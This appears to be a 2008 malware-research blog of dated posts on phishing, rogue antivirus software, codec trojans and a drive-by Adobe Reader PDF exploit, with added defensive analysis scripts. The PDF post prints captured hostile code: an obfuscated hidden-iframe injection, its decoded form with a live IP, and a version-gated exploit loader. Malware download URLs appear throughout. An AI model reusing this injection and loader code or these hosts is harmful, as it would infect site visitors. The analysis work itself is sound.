04 Sep

Lloyds TSB phishing scam

Today we are seeing an influx of Lloyds TSB bank phishing scam e-mails pouring in.  Here is what the e-mail looks like.  It contains a link to a phishing site that harvests the usernames and passwords entered into it.

[Image: Lloyds TSB Bank]

[Image: Lloyds TSB Bank phishing site]

Subject: Updated Terms and Conditions of Lloyds TSB Bank
Site: hxxp://www.lloydsterm.com
Harvests: User/Password/Memorable Information

04 Sep

Antivirus 2009…brought to you by Motigo?

A colleague called me today stating that his website had been hacked and he did not know what to do.  He was frantic and said that his website was distributing Antivirus 2009, so I decided to take a look at it and, lo and behold, we found Antivirus 2009 being distributed from the site's ad system.  For those who don't know what Antivirus 2009 is, it's a rogue (fake) security product.  You can see a video of it in action here. We traced the AV09 pop-up down to the following JavaScript counter code.

The ID has been removed to protect the victim's identity.

<!-- Begin Motigo Webstats counter code -->
<a id="*" href="hxxp://webstats.motigo.com/"><img src="hxxp://m1.webstats.motigo.com/n.gif?id=*" border="0" alt="Free counter and web stats" width="18" height="18" /></a>
<script src="hxxp://m1.webstats.motigo.com/c.js?id=*" type="text/javascript"></script>
<!-- End Motigo Webstats counter code -->

Resulted in this pop-up being displayed on his site:

[Image: Antivirus 2009 pop-up via Motigo]

Clicking the pop-up brought us to:

hxxp://quickupdates29.com (don't go here)

[Image: Antivirus 2009 site via Motigo]

File distributed:

File: AV2009Install_*.exe (0570484B66E9A139D8FD0A71F5448957)
MDB: /lithium-malware/AV2009Install.zip

The Motigo Webstats counter code is responsible for several pop-ups, and one of them is Antivirus 2009.  This is a scary thought: it means that everyone hosting this code on their website can potentially infect their viewers/customers.  This is an extremely cost-effective distribution method for the malware creators, and I bet we will see more like it as time goes by.
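The practical lesson of the counter code above is that every external host a page pulls a script, image or frame from is a party that can change what your visitors receive. The following is an added example, not code from the original post or from Motigo: a small Node script that inventories those hosts in static HTML and flags any that the site owner has not explicitly approved. The sample page (the site's own script, the counter snippet above, and the hidden iframe from the PDF exploit write-up on this page), the allowlist, and the site name example.com are constructed for the example.

```javascript
// Added example (not from the original post): list the external hosts a page
// pulls scripts, images, iframes and links from, and flag those the site owner
// has not approved. Regex-based on purpose so it runs in plain Node without a
// DOM library; adequate for a review pass over static HTML.

const TAG_RE = /<(script|img|iframe|a)\b([^>]*)>/gi;
// Accepts real URLs and the defanged hxxp:// form used in write-ups.
const URL_ATTR_RE = /\b(src|href)\s*=\s*["']?\s*((?:hxxps?|https?):\/\/[^"'\s>]+)/i;

// One record per external src/href: { tag, attr, host, url }.
function externalResources(html) {
  const found = [];
  let m;
  while ((m = TAG_RE.exec(html)) !== null) {
    const a = URL_ATTR_RE.exec(m[2]);
    if (!a) continue;                       // inline script, relative URL, etc.
    const url = a[2];
    const host = url.replace(/^\w+:\/\//, '').split(/[/?#]/)[0].toLowerCase();
    found.push({ tag: m[1].toLowerCase(), attr: a[1].toLowerCase(), host, url });
  }
  return found;
}

// Hosts that are neither the site itself nor on the allowlist, sorted by name,
// each with the tag types that reference it. A 'script' or 'iframe' entry means
// that host can run code or load further pages in the visitor's browser.
function unexpectedHosts(html, ownHost, allowlist) {
  const approved = new Set([ownHost, ...allowlist].map(h => h.toLowerCase()));
  const byHost = new Map();
  for (const r of externalResources(html)) {
    if (approved.has(r.host)) continue;
    if (!byHost.has(r.host)) byHost.set(r.host, new Set());
    byHost.get(r.host).add(r.tag);
  }
  return [...byHost.keys()].sort()
    .map(host => ({ host, tags: [...byHost.get(host)].sort() }));
}

// Constructed sample page: the site's own script (example.com is a placeholder
// name), the Motigo counter snippet from the post (defanged hxxp://), and the
// hidden iframe from the PDF exploit write-up on the same page.
const SAMPLE_HTML = `
<html><body>
<script src="http://example.com/site.js"></script>
<!-- Begin Motigo Webstats counter code -->
<a id="*" href="hxxp://webstats.motigo.com/"><img src="hxxp://m1.webstats.motigo.com/n.gif?id=*" border="0" alt="Free counter and web stats" width="18" height="18" /></a>
<script src="hxxp://m1.webstats.motigo.com/c.js?id=*" type="text/javascript"></script>
<!-- End Motigo Webstats counter code -->
<iframe src="http://69.46.27.41/afxv/tpv/index.php" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
</body></html>`;

// Review output: one line per unapproved host with the tag types that use it.
for (const r of unexpectedHosts(SAMPLE_HTML, 'example.com', [])) {
  console.log(`${r.host}\t${r.tags.join(',')}`);
}
```

Running it with an empty allowlist reports the two Motigo hosts and the iframe host; adding the counter hosts to the allowlist leaves only the hidden iframe, which is the kind of entry that should never appear on a page you did not put it on.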

Important note to website owners!

If you are going to use any service (free or paid), you'd better make sure you understand all of the terms and conditions.  It's not unusual for free services to be accompanied by ads or pop-ups, but you must ask yourself the following questions before putting anything on your site.

1. What is the service provider's privacy policy?

2. What are their terms of service?

3. How do they screen their affiliate links for malware/phishing attacks?

Finally, it’s important to see what their users think of the service.  As we can see, Motigo has a laundry list of pop-up complaints:

03 Sep

Antivirus 2009 (video)

Sites: hxxp://antivirusworld9.com -> hxxp://scanthnet.com -> hxxp://innovagest2000sl.com
Files: AV2009Install_*.exe (0570484B66E9A139D8FD0A71F5448957)
VirusTotal Result: 4/36 (11.11%)
MDB: /lithium-malware/AV2009Install.zip


03 Sep

Database Update: 10 Files Added

Here is a fresh round of malware discovered today.  Most are the usual Zlob variants.  This post may be updated as more information about the malware is found, so check back.  All files are available in /pnuemo-malware/.

Links may still be live.  Proceed at your own risk.

city-codec.v.1.345.exe
Result: 18/36 (50%)
MD5: 905c85ab50f200dd0229cc93e055ed5a
VirusTotal
hxxp://city-codec.com/download/city-codec.v.1.345.exe

citycodec.v3.001.exe
Result: 5/36 (13.89%)
MD5: b71e1150138e77c14b9caa62bcd5b259
VirusTotal
hxxp://citycodec.net/download/citycodec.v3.001.exe

zcodec.1062.exe & zcodec.1091.exe
Result: 5/36 (13.89%)
MD5: b0c7c21760919e0df7606dadde5413ae
VirusTotal
hxxp://codecdownload.anothersoftportal09.com/zcodec.1062.exe
hxxp://codecdownload.anothersoftportal09.com/zcodec.1091.exe

HDCodec_ver1.5000.0.exe
Result: 2/36 (5.56%)
MD5: 5b055fc89bc0dbb2ebce8c76a7ca7c1a
VirusTotal
Sunbelt Sandbox Analysis
hxxp://pornotube8.net/load.php?

WebSoftCodecDrivern.exe
Result: 7/36 (19.45%)
MD5: d3691fac5ee729794dd013e0807514a0
VirusTotal
Sunbelt Sandbox Analysis
hxxp://viacodecright2.com/08.php

xcodec.186.exe
Result: 6/36 (16.67%)
MD5: f96300487a4472da3c0e7083534732c1
VirusTotal
Sunbelt Sandbox Analysis
hxxp://hot-porn-tube2009.net/viewmovie.php?id=186

setup.exe & setup.exe (2)
Result: 8/36 (22.23%)
MD5: 989c2f345c04eb02a7277175fdd8ee32
MD5: 632847f20721a3cf09f991fbe1acc5a6 (2)
VirusTotal
VirusTotal (2)
hxxp://www.vidsware.net/download.php?id=1653
hxxp://www.vidsware.net/download.php?id=1285 (2)

index
Result: 3/36 (8.34%)
MD5: b8db4c79a11c6a4451bf9c02bdfcfcbe
VirusTotal
hxxp://wwwforum.myphotos.cc/stat.php?f=105

02 Sep

WinSpywareProtect online scanner (2/36 detection)

We found a new WinSpywareProtect binary in the wild today. It currently has a low (2/36, heuristic) detection rate at VirusTotal.  We recommend not visiting the sites unless you know what you are doing.  Proceed at your own risk.

[Image: WinSpywareProtect]

Site: hxxp://win-xp-antivir-hqscanner.com/ | hxxp://download-soft-basez.com
File: antivirus.v.1.exe (A3CB3D1DD392E1DF079F263B9C653EE8)
VirusTotal: Result: 2/36 (5.56%)
MDB: /lithium-malware/antivirus.v.1.zip

01 Sep

New domains pushing Advanced Antivirus

I noticed a few Advanced Antivirus URLs started to appear this morning.  I chuckle a little bit every time I see Advanced Antivirus pop up, mainly because I own AdvancedAntivirus.com (I bought it before the rogue software was created, for an oddball project).  Finally beat the suckers to the punch! We'll set the laughs aside for a bit and get to the details.

[Image: Advanced Antivirus]

File: AAVSetup.exe
MD5: 236B5229DE10D5C0ECF2743A981B646C
VirusTotal: 14/36 (38.89%)
MDB: /lithium-malware/AAVSetup.zip

Sites Distributing:

  • hxxp://antivirus-help1.com
  • hxxp://antivirus-help10.com
  • hxxp://antivirus-help2.com
  • hxxp://antivirus-help3.com
  • hxxp://antivirus-help4.com
  • hxxp://antivirus-help5.com
  • hxxp://antivirus-help6.com
  • hxxp://antivirus-help7.com
  • hxxp://antivirus-help8.com
  • hxxp://antivirus-help9.com

31 Aug

File Added: MediaTubeCodec_ver1.955.0.exe

Only one file to add to the database today. Maybe later on there will be more. As usual, the URL is still live so proceed at your own risk. This is available in /pnuemo-malware/.

MediaTubeCodec_ver1.955.0.exe
Result: 3/35 (8.58%)
MD5: 1968047e55acf222d7d0a4eaee1a3c40
VirusTotal
ThreatExpert Analysis
hxxp://software-for-me08.com/download/502/955/0/

31 Aug

Adobe Acrobat Reader PDF Exploit (gnu.pdf & us.pdf) (UPDATED)

This morning we've found a PDF file that exploits a vulnerability in Adobe Acrobat.

When the user is directed to the infected site, a hidden iframe loads the PDF file needed to exploit the machine.  Here's what happens…

Links still live, proceed at your own risk.

The user visits hxxp://120.50.46.90/~admin/tps/index.php, and the following obfuscated code is included:

<script language="javascript">document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%39%2E%34%36%2E%32%37%2E%34%31%2F%61%66%78%76%2F%74%70%76%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));</script>

when deobfuscated…

<iframe src="http://69.46.27.41/afxv/tpv/index.php" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
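The deobfuscation step above was done by hand; it can be done mechanically, and without ever evaluating the attacker's script, by pulling the `unescape('...')` literal out of the source and applying the same percent-decoding the browser would. The following is an added example, not code from the original post: a Node script that decodes every `document.write(unescape(...))` payload in a captured page and lists the iframe targets it would have written, noting which ones are made invisible. The input is the obfuscated block from this post, reproduced as a string with the line breaks the capture shows; those are stripped before decoding.

```javascript
// Added example (not from the original post): static decoding of the
// document.write(unescape('%..')) loader pattern, without executing it.

// Matches unescape('...') or unescape("..."), allowing line breaks inside the
// literal (captures are often wrapped) and escaped characters.
const UNESCAPE_CALL_RE = /unescape\(\s*(['"])((?:\\.|(?!\1)[^\\])*)\1\s*\)/gi;

// Same mapping as the browser's legacy unescape(): %XX and %uXXXX to characters.
function decodePercent(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u, b) => String.fromCharCode(parseInt(u || b, 16)));
}

// Every decoded unescape('...') payload in a script, in order of appearance.
function decodeUnescapePayloads(source) {
  const payloads = [];
  let m;
  while ((m = UNESCAPE_CALL_RE.exec(source)) !== null) {
    payloads.push(decodePercent(m[2].replace(/\s+/g, '')));
  }
  return payloads;
}

// For decoded markup, list each iframe's src and whether it is made invisible
// (visibility:hidden, or a 1x1 frame), which is the drive-by pattern in the post.
function iframeTargets(markup) {
  const targets = [];
  const re = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = re.exec(markup)) !== null) {
    const attrs = m[1];
    const src = (/\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(attrs) || [])[1] || '';
    const tiny = /\bwidth\s*=\s*["']?1\b/i.test(attrs) && /\bheight\s*=\s*["']?1\b/i.test(attrs);
    const hidden = /visibility\s*:\s*hidden/i.test(attrs) || tiny;
    targets.push({ src, hidden });
  }
  return targets;
}

// The captured loader from the post, reproduced as a string (line breaks as in
// the capture).
const CAPTURED_LOADER = `<script language="javascript">document.write(unescape('%3C%69%66%72
%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%39%2E
%34%36%2E%32%37%2E%34%31%2F%61%66%78%76%2F%74%70%76%2F%69
%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68
%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69
%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74
%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66
%72%61%6D%65%3E'));</script>`;

for (const markup of decodeUnescapePayloads(CAPTURED_LOADER)) {
  console.log('decoded:', markup);
  for (const t of iframeTargets(markup)) {
    console.log(`iframe -> ${t.src} (hidden: ${t.hidden})`);
  }
}
```

The decoder only handles the single layer of percent-encoding used here; loaders that stack several encodings need the output fed back through whatever the next layer is, which is still preferable to running the script to see what it does.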

We can see the hidden iframe above and the page includes the following code…

<script>
// Walk the browser's plugin list and scrape two version strings:
// the Acrobat/Reader plugin version (ppdf) and the Flash version (flash).
ppdf=0;
i=0;
for(;navigator.plugins[i];i++)
{
  // Loosely matches "Adobe Acrobat Plug-In ... <major>.<minor>"
  re=/.d.{2}e.A.{2}o.....l..-.+?([0-9]+.[0-9]+)/;
  if(res=re.exec(navigator.plugins[i].description))
  {
    ppdf=res[1];
  }
  // Loosely matches "Shockwave Flash <major>.<minor> r<build>"; scraped but unused here
  var re=/.h.{5}v.+?s.\s([0-9])\S([0-9]).+?([0-9]{1,5})/;
  var res;
  if(res=re.exec(navigator.plugins[i].description))
  {
    flash=res[1]+'.'+res[2]+'.'+res[3];
  }
}
// Only write the PDF iframe when the Reader version is below 7, or is 7.0.x
ppdfenable=0;
if(ppdf!=0)
{
  ppdfenable=0;
  ppdf=ppdf.replace(/\D/g,"");
  if(ppdf[0]==7 && ppdf[1]<1)ppdfenable=1;
  if(ppdf[0]<7)ppdfenable=1;
  if(ppdfenable)
  {
    document.write('<iframe width=1 height=1 src="hxxp://69.46.27.41/afxv/tpv/gnu.pdf"></iframe>');
  }
}
</script>

Thus leading us to the PDF in question, located at hxxp://69.46.27.41/afxv/tpv/gnu.pdf. Here is additional information regarding this file. It is also available in /pnuemo-malware/.
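The loader above does not serve gnu.pdf to everyone: it scrapes the Reader plugin's version string from navigator.plugins and only writes the iframe when that version is below 7 or is 7.0.x, which is why "update your software" is the whole defence here. The following is an added example, not code from the original post: the loader's two regexes and its version gate re-implemented as pure functions, so an analyst can check from a plugin description string whether the loader would have served the PDF, without running the loader. The plugin description strings are constructed samples in the format the regexes expect.

```javascript
// Added example (not from the original post): the gnu.pdf loader's version
// gate as pure functions, for offline analysis of which plugin descriptions
// it targets. The two regexes are copied from the loader on the page.

const ACROBAT_RE = /.d.{2}e.A.{2}o.....l..-.+?([0-9]+.[0-9]+)/;
const FLASH_RE = /.h.{5}v.+?s.\s([0-9])\S([0-9]).+?([0-9]{1,5})/;

// Mirror of the loader's scraping loop: returns the Acrobat version string
// ("7.0") and Flash version string ("9.0.115") it would have extracted, or null.
function scrapeVersions(pluginDescriptions) {
  let acrobat = null, flash = null;
  for (const d of pluginDescriptions) {
    let r = ACROBAT_RE.exec(d);
    if (r) acrobat = r[1];
    r = FLASH_RE.exec(d);
    if (r) flash = r[1] + '.' + r[2] + '.' + r[3];
  }
  return { acrobat, flash };
}

// Mirror of the loader's decision: strip non-digits, then serve only when the
// first digit is below 7, or is 7 with a second digit of 0 (i.e. 7.0.x).
// Note the gate looks at single digits, so a two-digit major such as "10.1"
// would be read as "1" and also pass; the check is crude, not a real version
// comparison.
function loaderWouldServePdf(pluginDescriptions) {
  const { acrobat } = scrapeVersions(pluginDescriptions);
  if (acrobat === null) return false;          // no Reader plugin found: nothing written
  const digits = acrobat.replace(/\D/g, '');
  if (digits[0] === '7' && Number(digits[1]) < 1) return true;
  if (Number(digits[0]) < 7) return true;
  return false;
}

// Constructed sample descriptions in the layout the loader's regexes expect.
const SAMPLES = [
  ['Shockwave Flash 9.0 r115', 'Adobe Acrobat Plug-In Version 7.0.0 for Netscape'],
  ['Adobe Acrobat Plug-In Version 6.0.0 for Netscape'],
  ['Adobe Acrobat Plug-In Version 7.1.0 for Netscape'],
  ['Adobe Acrobat Plug-In Version 8.1.2 for Netscape'],
  ['Shockwave Flash 9.0 r115'],
];

for (const plugins of SAMPLES) {
  const v = scrapeVersions(plugins);
  console.log(`acrobat=${v.acrobat} flash=${v.flash} -> serves gnu.pdf: ${loaderWouldServePdf(plugins)}`);
}
```

Run against the samples, only the 7.0.x and 6.0.x descriptions trigger the iframe; 7.1 and 8.1.2 do not, and a browser with no Reader plugin at all gets nothing written.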

gnu.pdf
Result: 6/35 (17.15%)
MD5: 213d20a0523b6ea6c93d4348a509c34c
VirusTotal

Update your software!

UPDATED 9/1 12p PST

us.pdf
Result: 10/36 (27.78%)
MD5: 8175212481f069a6dd54de9cbd044039
VirusTotal
hxxp://174.133.121.165/us.pdf
hxxp://88.85.95.134/us.pdf

30 Aug

Rogue Software Removal (VIDEO)

This is a special post that will provide some knowledge on how to remove some of the rogue anti-malware software that has become an epidemic (Antivirus 2008, XP Antivirus, MS Antivirus, etc.). AV companies try their best to keep up with all the latest incarnations of this rogue software, but in some cases it can take weeks for your AV to detect them. This will show you how you can remove some of these with free utilities. These instructions may not be that easy for the novice user, but we tried to make them as simple as possible. I will say that this process may not work in EVERY case; however, most of the ones we've come across can be removed this way. Please be careful when attempting to remove this malware: you do not want to delete the wrong file.  Try this at your own risk.

The tools used in this video are Process Explorer and Autoruns, both available for free from SysInternals.
Process Explorer
Autoruns

[Video: click the image to play, or download the video (.wmv)]

30 Aug

New Wista Antivirus 2009 (Not detected)

Today we found a new site distributing the rogue anti-malware software Wista Antivirus 2009. The file downloaded from the website, setup_en.exe (575953F4912EA2B9FF2598D0EE561828), currently shows zero detection over at VirusTotal.  If we click on "Free Scan" we are redirected to a fake scan page, and the removal file it offers points to "Spyware Isolator", which is detected by most AVs.

[Image: Wista Antivirus 2009]

Site: hxxp://wista-antivirus2009.com
File: setup_en.exe 3126445 bytes | spywareisolator_installer.exe 81920 bytes
MDB Path: /lithium-malware/setup_en.zip | /lithium-malware/

September 2008